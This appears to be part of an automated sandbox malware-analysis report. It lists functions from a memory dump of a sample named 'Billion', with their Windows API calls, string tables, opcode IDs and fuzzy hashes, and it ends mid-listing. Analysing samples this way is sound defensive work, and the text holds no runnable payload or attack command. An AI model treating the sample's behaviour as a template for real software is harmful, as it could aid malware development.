                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                                                                                                                                          • API String ID: 1103490817-4258414348
                                                                                                                                                                                                                                                                                                          • Opcode ID: bd48b7dd2af3d72210623875d867082ada33d1153352b6956e21b426b4d68974
                                                                                                                                                                                                                                                                                                          • Instruction ID: df9c5e1725ee74b1f98859ed05c9fc595142747ec85d5e3e9c60e30762d2e949
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd48b7dd2af3d72210623875d867082ada33d1153352b6956e21b426b4d68974
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6DE18C71648301AFCB14DF24C550A6AB7E2BFA6314F15896CF8969B3A2DB30ED45CB81
                                                                                                                                                                                                                                                                                                          Function 001BD3F8 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                                                                                                          • API String ID: 1256254125-909552448
                                                                                                                                                                                                                                                                                                          • Opcode ID: 82bab8fe83967c7b354339af1ea86c56db72151772a5b74bbf2d9bc92acb8b28
                                                                                                                                                                                                                                                                                                          • Instruction ID: c81694ac54f0cfbc8c9e63d04f3ff83e1b00de41f886fa7b482e4041f74a1e3b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82bab8fe83967c7b354339af1ea86c56db72151772a5b74bbf2d9bc92acb8b28
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4771EA7260051A8BCB289F7CE9515FB33A1AF70758F250128FC55AB294FB35DD45C7A0
                                                                                                                                                                                                                                                                                                          Function 001C8D97 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001C8DB5
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001C8DC9
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001C8DEC
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001C8E0F
                                                                                                                                                                                                                                                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 001C8E4D
                                                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,001C6691), ref: 001C8EA9
                                                                                                                                                                                                                                                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 001C8EE2
                                                                                                                                                                                                                                                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 001C8F25
                                                                                                                                                                                                                                                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 001C8F5C
                                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 001C8F68
                                                                                                                                                                                                                                                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 001C8F78
                                                                                                                                                                                                                                                                                                          • DestroyIcon.USER32(?,?,?,?,?,001C6691), ref: 001C8F87
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 001C8FA4
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 001C8FB0
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                                                                                                                                                          • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                                                                                                          • API String ID: 799131459-1154884017
                                                                                                                                                                                                                                                                                                          • Opcode ID: a1b43380d412079b0e1799ff2197077f2ca726d2f30260eff3bc275b8c59ce73
                                                                                                                                                                                                                                                                                                          • Instruction ID: a4cb9b65f6727d302765c48c3be6c026279de612ec758957022a3c2af74fedbd
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1b43380d412079b0e1799ff2197077f2ca726d2f30260eff3bc275b8c59ce73
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0961CF71900219FAEB14DF64DC81FBEBBA8AF28B15F10411AF915DA1D1DB74E990CBA0
                                                                                                                                                                                                                                                                                                          Function 001A48BE Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CharLowerBuffW.USER32(?,?), ref: 001A493D
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001A4948
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001A499F
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001A49DD
                                                                                                                                                                                                                                                                                                          • GetDriveTypeW.KERNEL32(?), ref: 001A4A1B
                                                                                                                                                                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001A4A63
                                                                                                                                                                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001A4A9E
                                                                                                                                                                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001A4ACC
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                                                                                          • API String ID: 1839972693-4113822522
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5cbdae691e47afb0b24cace983dbde2b5f6226d76aa9169f0280987f6d591164
                                                                                                                                                                                                                                                                                                          • Instruction ID: f37dc7a6c708a4f6c3775f4f005c1b54ffe7746a0917b80c06434d9ae85454e6
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5cbdae691e47afb0b24cace983dbde2b5f6226d76aa9169f0280987f6d591164
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5071F1766083069FC710EF24C88197BB7E4EFA9768F00492DF896972A1EB70DD45CB91
                                                                                                                                                                                                                                                                                                          Function 00196382 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • LoadIconW.USER32(00000063), ref: 00196395
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 001963A7
                                                                                                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 001963BE
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 001963D3
                                                                                                                                                                                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 001963D9
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 001963E9
                                                                                                                                                                                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 001963EF
                                                                                                                                                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00196410
                                                                                                                                                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0019642A
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00196433
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0019649A
                                                                                                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 001964D6
                                                                                                                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 001964DC
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 001964E3
                                                                                                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 0019653A
                                                                                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00196547
                                                                                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000005,00000000,?), ref: 0019656C
                                                                                                                                                                                                                                                                                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00196596
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 895679908-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: fe28f2f0acef3af39e6adb5769eb17daf8e257a109542da25be0394f5a58e46e
                                                                                                                                                                                                                                                                                                          • Instruction ID: 4321fe89c16cd584e58130418831a09b51a3a038897ef1ee302ad5eb8abee1eb
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe28f2f0acef3af39e6adb5769eb17daf8e257a109542da25be0394f5a58e46e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F713931900709AFDF20DFA8DE85EAEBBF5FF48704F104928E586A25A0D775E944CB60
                                                                                                                                                                                                                                                                                                          Function 001B086B Relevance: 27.1, APIs: 18, Instructions: 128COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 001B0884
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 001B088F
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 001B089A
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 001B08A5
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 001B08B0
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 001B08BB
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F81), ref: 001B08C6
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 001B08D1
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F80), ref: 001B08DC
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 001B08E7
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 001B08F2
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 001B08FD
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 001B0908
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 001B0913
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 001B091E
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 001B0929
                                                                                                                                                                                                                                                                                                          • GetCursorInfo.USER32(?), ref: 001B0939
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 001B097B
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3215588206-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 6626a7a0d9a93081c8bcc8abc283be170c4bac1588660d718e217c136cd1f3d2
                                                                                                                                                                                                                                                                                                          • Instruction ID: 0160457b3e9c5d52297881c12fc2d9668f39ad9a307cca1ccdb249eac83fa8b4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6626a7a0d9a93081c8bcc8abc283be170c4bac1588660d718e217c136cd1f3d2
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D14142B0D083196ADB109FBA8C89C6EBFE8FF08754B50452AE11CE7291DB78D901CF91
                                                                                                                                                                                                                                                                                                          Function 00150436 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00150436
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0015045D: InitializeCriticalSectionAndSpinCount.KERNEL32(0020170C,00000FA0,E99CF4C7,?,?,?,?,00172733,000000FF), ref: 0015048C
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0015045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00172733,000000FF), ref: 00150497
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0015045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00172733,000000FF), ref: 001504A8
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0015045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 001504BE
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0015045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 001504CC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0015045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 001504DA
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0015045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00150505
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0015045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00150510
                                                                                                                                                                                                                                                                                                          • ___scrt_fastfail.LIBCMT ref: 00150457
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00150413: __onexit.LIBCMT ref: 00150419
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00150492
                                                                                                                                                                                                                                                                                                          • SleepConditionVariableCS, xrefs: 001504C4
                                                                                                                                                                                                                                                                                                          • InitializeConditionVariable, xrefs: 001504B8
                                                                                                                                                                                                                                                                                                          • WakeAllConditionVariable, xrefs: 001504D2
                                                                                                                                                                                                                                                                                                          • kernel32.dll, xrefs: 001504A3
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                                                                                                                                                          • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                                                                          • API String ID: 66158676-1714406822
                                                                                                                                                                                                                                                                                                          • Opcode ID: 15d9228e7bc50854e4a67df30bb742ef40b6b36f01049e6f83ac5b9997392967
                                                                                                                                                                                                                                                                                                          • Instruction ID: 9a0ff54b3fcdeecaabfa7ed962d9b762cd55b5371f7a95911c24758b413ad024
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 15d9228e7bc50854e4a67df30bb742ef40b6b36f01049e6f83ac5b9997392967
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0221D432A40B04EBD7232BE4BC4AF697794EB0CB62F040136FD159A690EB70D8448A51
                                                                                                                                                                                                                                                                                                          Function 00193A43 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _wcslen
                                                                                                                                                                                                                                                                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                                                                                                                                          • API String ID: 176396367-1603158881
                                                                                                                                                                                                                                                                                                          • Opcode ID: 05dfa9a3202d4d796ee92d3368c9a3978b5372158da7c638b44b06351cee7967
                                                                                                                                                                                                                                                                                                          • Instruction ID: 93addd3e2e168be848f2cd1ba24ed72fc5898769346f3b53256800bc9c93f29a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05dfa9a3202d4d796ee92d3368c9a3978b5372158da7c638b44b06351cee7967
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65E1E332E00516ABCF189FB8C8916EDBBB5BF54710F51412AE576F7250EB30AE898790
                                                                                                                                                                                                                                                                                                          Function 001A4F05 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CharLowerBuffW.USER32(00000000,00000000,001CDCD0), ref: 001A4F6C
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001A4F80
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001A4FDE
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001A5039
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001A5084
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001A50EC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0014FD52: _wcslen.LIBCMT ref: 0014FD5D
                                                                                                                                                                                                                                                                                                          • GetDriveTypeW.KERNEL32(?,001F7C10,00000061), ref: 001A5188
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                                                                                          • API String ID: 2055661098-1000479233
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4f30797d9c8bdb144c33cea2dcc7d7296e3a3d58d3b21a25dd4010c525a6a59d
                                                                                                                                                                                                                                                                                                          • Instruction ID: 5c53c4c3aa3a2070192dba9529892bd01242931255729c40879d6d8b36ee1202
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f30797d9c8bdb144c33cea2dcc7d7296e3a3d58d3b21a25dd4010c525a6a59d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3B1013560C7029FC314DF28C990A7AB7E6BFA6724F10491DF59687292D730D884CB92
                                                                                                                                                                                                                                                                                                          Function 001BBA59 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001BBBF8
                                                                                                                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 001BBC10
                                                                                                                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 001BBC34
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001BBC60
                                                                                                                                                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 001BBC74
                                                                                                                                                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 001BBC96
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001BBD92
